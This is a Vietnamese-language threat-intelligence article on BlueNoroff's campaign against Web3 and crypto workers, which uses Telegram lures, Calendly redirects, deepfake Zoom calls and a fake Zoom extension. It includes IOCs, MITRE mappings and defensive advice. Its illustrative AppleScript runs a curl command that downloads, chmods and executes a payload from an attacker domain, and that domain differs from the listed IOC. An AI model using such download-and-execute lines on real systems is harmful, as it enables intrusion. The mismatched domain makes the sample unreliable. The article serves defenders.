BlueNoroff Tấn Công Web3: Khai Thác Zoom, Deepfake và Malware macOS

23/06/2025
6 mins read

Trong bối cảnh các mối đe dọa mạng ngày càng tinh vi, nhóm tác nhân đe dọa (APT) BlueNoroff, được biết đến là một phần của chiến dịch tấn công do Triều Tiên hậu thuẫn, đã và đang thực hiện các chiến dịch tấn công nhắm mục tiêu vào các tổ chức và cá nhân trong lĩnh vực Web3 và tiền điện tử (cryptocurrency). Các cuộc tấn công gần đây của BlueNoroff nổi bật với việc lợi dụng ứng dụng họp trực tuyến Zoom và các kỹ thuật lừa đảo tinh vi, bao gồm việc sử dụng deepfake để mạo danh các giám đốc điều hành công ty, nhằm lừa nạn nhân cài đặt phần mềm độc hại trên các thiết bị Apple macOS.

Nội dung
Chiến dịch Malware/APT: BlueNoroff Khai thác ứng dụng Zoom
Tổng quan về chiến dịch
Các kỹ thuật, chiến thuật và quy trình (TTPs)
Cơ sở hạ tầng (Infrastructure)
Các chỉ số thỏa hiệp (IOCs) và đoạn mã (Code Snippets)
Các biện pháp khắc phục và khuyến nghị

Chiến dịch Malware/APT: BlueNoroff Khai thác ứng dụng Zoom

Tổng quan về chiến dịch

Chiến dịch của BlueNoroff không chỉ đơn thuần là gửi các email lừa đảo thông thường mà là một kế hoạch đa giai đoạn, được thiết kế để tạo sự tin tưởng và đánh lừa nạn nhân. Mục tiêu chính là các nhân viên làm việc trong ngành Web3 và tiền điện tử, một lĩnh vực có giá trị tài sản cao và thường xuyên sử dụng các nền tảng giao tiếp trực tuyến. Kẻ tấn công sử dụng các cuộc gọi Zoom đã được dàn dựng kỹ lưỡng, trong đó xuất hiện các nhân vật được tạo bằng công nghệ deepfake, mạo danh các lãnh đạo cấp cao của công ty để tạo độ tin cậy và thúc đẩy nạn nhân thực hiện các hành động cài đặt phần mềm độc hại.

Các kỹ thuật, chiến thuật và quy trình (TTPs)

Chiến dịch của BlueNoroff tuân theo một chuỗi các TTPs được thiết kế để vượt qua các biện pháp bảo mật thông thường và khai thác yếu tố con người. Các kỹ thuật này có thể được ánh xạ tới MITRE ATT&CK Framework như sau:

  • Tiếp cận Ban đầu (Initial Access): Kẻ tấn công thường bắt đầu bằng cách gửi tin nhắn qua Telegram từ một liên hệ bên ngoài, yêu cầu một cuộc họp. Telegram được chọn do tính phổ biến và sự chấp nhận cao trong cộng đồng Web3crypto, giúp kẻ tấn công dễ dàng tiếp cận mục tiêu mà không gây nghi ngờ ngay lập tức.
  • Lừa đảo (Phishing): Để lên lịch cuộc họp, kẻ tấn công lạm dụng các công cụ phổ biến như Calendly. Nạn nhân được hướng dẫn truy cập một liên kết Calendly, nhưng liên kết này không dẫn đến một trang hợp pháp mà thay vào đó chuyển hướng đến một tên miền Zoom giả mạo do kẻ tấn công kiểm soát. Điều này nhằm tạo ra một môi trường giả mạo hoàn hảo, chuẩn bị cho bước tấn công tiếp theo.
    • Kỹ thuật MITRE ATT&CK có khả năng: T1566.002: Phishing – Spearphishing Link (Lừa đảo – Liên kết spearphishing). Kẻ tấn công tạo ra các liên kết độc hại, được ngụy trang cẩn thận để đánh lừa nạn nhân.
  • Mạo danh (Impersonation): Trong quá trình diễn ra cuộc họp Zoom, kẻ tấn công sử dụng các nhân vật video được tạo bằng công nghệ deepfake để mạo danh các lãnh đạo cấp cao của công ty. Kỹ thuật này đặc biệt hiệu quả trong việc phá vỡ sự cảnh giác của nạn nhân, khiến họ tin rằng họ đang tương tác với một người có thẩm quyền và đáng tin cậy. Các cuộc họp thường được tổ chức dưới dạng nhóm, tăng thêm tính xác thực của kịch bản tấn công.
  • Thực thi (Execution): Đây là giai đoạn quan trọng nhất của cuộc tấn công, nơi phần mềm độc hại được triển khai. Nạn nhân được hướng dẫn tải xuống và cài đặt một “tiện ích mở rộng Zoom” với lý do giả mạo là do “sự cố micrô”. Trên thực tế, “tiện ích mở rộng” này là một đoạn mã AppleScript độc hại.
    • Kỹ thuật MITRE ATT&CK có khả năng:
      • T1078.004: Valid Accounts – Cloud Accounts (Tài khoản Hợp lệ – Tài khoản Đám mây). Mặc dù không trực tiếp là tài khoản đám mây, việc lạm dụng nền tảng giao tiếp phổ biến như Zoom để thực thi mã độc là một dạng khai thác sự tin cậy trong các dịch vụ đám mây.
      • T1059.007: Command-Line Interface – JavaScript/AppleScript (Giao diện Dòng lệnh – JavaScript/AppleScript). Kẻ tấn công sử dụng AppleScript để thực thi các lệnh hệ thống một cách âm thầm trên thiết bị macOS của nạn nhân.
      • T1195.001: Supply Chain Compromise – Compromise Software Dependencies (Thỏa hiệp Chuỗi Cung ứng – Thỏa hiệp Phụ thuộc Phần mềm). Mặc dù không phải là thỏa hiệp chuỗi cung ứng theo nghĩa truyền thống, việc ngụy trang mã độc thành “tiện ích mở rộng Zoom” là một hình thức giả mạo thành phần phần mềm đáng tin cậy.

Cơ sở hạ tầng (Infrastructure)

Để thực hiện chiến dịch này, BlueNoroff đã thiết lập một cơ sở hạ tầng được thiết kế để trông giống các dịch vụ hợp pháp, nhằm lừa dối nạn nhân và duy trì khả năng hoạt động. Điều này bao gồm:

  • Tên miền Giả mạo (Fake Domain): Kẻ tấn công đã sử dụng tên miền giả mạo như support.us05web-zoom.biz. Tên miền này được sử dụng làm máy chủ từ xa (remote server) để phân phối tải trọng (payload delivery) và có thể là máy chủ điều khiển và chỉ huy (C2). Tên miền được thiết kế để trông rất giống tên miền hợp pháp của Zoom, chỉ khác biệt ở một vài ký tự nhỏ, khiến người dùng khó nhận ra sự khác biệt.
    support.us05web-zoom.biz
  • Lạm dụng Công cụ Lên lịch họp (Meeting Scheduling Tool Abuse): Các liên kết Calendly ban đầu được sử dụng để dẫn nạn nhân đến các sự kiện Google Meet, sau đó lại chuyển hướng người dùng đến các tên miền Zoom giả mạo do kẻ tấn công kiểm soát. Chuỗi chuyển hướng này giúp tăng cường độ phức tạp của cuộc tấn công và làm cho việc truy vết trở nên khó khăn hơn.

Các chỉ số thỏa hiệp (IOCs) và đoạn mã (Code Snippets)

Việc nắm bắt các IOCs là cực kỳ quan trọng để phát hiện và ngăn chặn các cuộc tấn công tương tự trong tương lai. Các IOCs và thông tin về mã độc được xác định trong chiến dịch này bao gồm:

LoạiChỉ số/Mã
Tên tệpzoom_sdk_support.scpt
Loại ScriptAppleScript
Tải trọngMã độc mở trang web Zoom SDK hợp pháp trong khi âm thầm tải xuống tải trọng giai đoạn tiếp theo từ máy chủ từ xa (support.us05web-zoom.biz) và thực thi một shell script.

Đoạn mã AppleScript được thiết kế để thực hiện một hành động hợp pháp (mở trang web) để che giấu hành động độc hại chính. Cấu trúc của script này thường bao gồm việc sử dụng lệnh do shell script để thực thi các lệnh dòng lệnh. Dưới đây là một cấu trúc ví dụ được suy luận từ mô tả, minh họa cách thức kẻ tấn công thực hiện hành vi này:

-- Example structure inferred from description:
-- Legitimate page opened as cover action
open location "https://developer.zoom.us/docs/sdk/"
-- Malicious code downloads and executes next-stage payload
do shell script "curl http://support.us05web-sharepoint.biz/payload.sh > /tmp/payload.sh && chmod +x /tmp/payload.sh && /tmp/payload.sh"

Đoạn mã trên cho thấy cách AppleScript có thể được sử dụng để tải xuống một tệp thực thi từ xa (payload.sh) bằng lệnh curl, sau đó cấp quyền thực thi cho tệp đó bằng chmod +x, và cuối cùng thực thi tải trọng đó. Điều này cho phép kẻ tấn công thiết lập một kết nối C2 hoặc triển khai thêm các công cụ độc hại khác lên hệ thống nạn nhân. Cần lưu ý rằng đoạn mã trên là minh họa dựa trên hành vi được mô tả; nội dung script thực tế có thể khác.

Các biện pháp khắc phục và khuyến nghị

Để bảo vệ tổ chức và người dùng khỏi các cuộc tấn công tinh vi như của BlueNoroff, cần áp dụng các biện pháp phòng ngừa và phát hiện chặt chẽ. Dựa trên các thông tin về chiến dịch này, các khuyến nghị chính bao gồm:

  • Chặn truy cập vào các tên miền đáng ngờ: Ngay lập tức thêm các tên miền như support.us05web-zoom.biz vào danh sách chặn trên tường lửa, DNS resolver, hoặc các giải pháp bảo mật mạng khác. Việc này ngăn chặn kết nối đến các máy chủ C2 và tải xuống tải trọng độc hại.
  • Nâng cao nhận thức về lừa đảo (Phishing Awareness): Đào tạo người dùng về các dấu hiệu của email và tin nhắn lừa đảo, đặc biệt là các biến thể tinh vi như lạm dụng công cụ lên lịch (Calendly) và các liên kết chuyển hướng. Hướng dẫn người dùng luôn kiểm tra kỹ tên miền của trang web trước khi nhập thông tin hoặc tải xuống bất kỳ tệp nào.
  • Xác minh nguồn gốc cuộc họp: Luôn xác minh tính hợp lệ của các cuộc họp và yêu cầu cài đặt phần mềm. Khi có yêu cầu tải xuống “tiện ích mở rộng” hoặc phần mềm mới, hãy yêu cầu xác nhận qua một kênh liên lạc thứ hai đáng tin cậy (ví dụ: gọi điện trực tiếp cho người yêu cầu).
  • Triển khai giải pháp EDR/Antivirus mạnh mẽ: Sử dụng các giải pháp phát hiện và phản hồi điểm cuối (EDR) hoặc phần mềm chống vi-rút (Antivirus) tiên tiến có khả năng phát hiện các hành vi độc hại như thực thi shell script hoặc tải xuống tệp từ các nguồn không xác định. Đảm bảo rằng các giải pháp này được cập nhật thường xuyên.
  • Chính sách cài đặt phần mềm chặt chẽ: Áp dụng các chính sách nghiêm ngặt về việc cài đặt phần mềm, đặc biệt là trên các thiết bị công ty. Hạn chế quyền cài đặt phần mềm chỉ cho các quản trị viên hệ thống hoặc thông qua các kênh phân phối phần mềm được phê duyệt. Tránh cài đặt các “tiện ích mở rộng” hoặc ứng dụng không có nguồn gốc rõ ràng.
  • Giám sát lưu lượng mạng: Triển khai giải pháp giám sát lưu lượng mạng (network traffic monitoring) và hệ thống thông tin bảo mật và quản lý sự kiện (SIEM) để phát hiện các kết nối bất thường đến các tên miền đáng ngờ hoặc các hành vi tải xuống không được ủy quyền.

Việc hiểu rõ các TTPs của BlueNoroff và triển khai các biện pháp bảo mật phù hợp là chìa khóa để bảo vệ hệ thống và dữ liệu khỏi các mối đe dọa dai dẳng và ngày càng tinh vi này.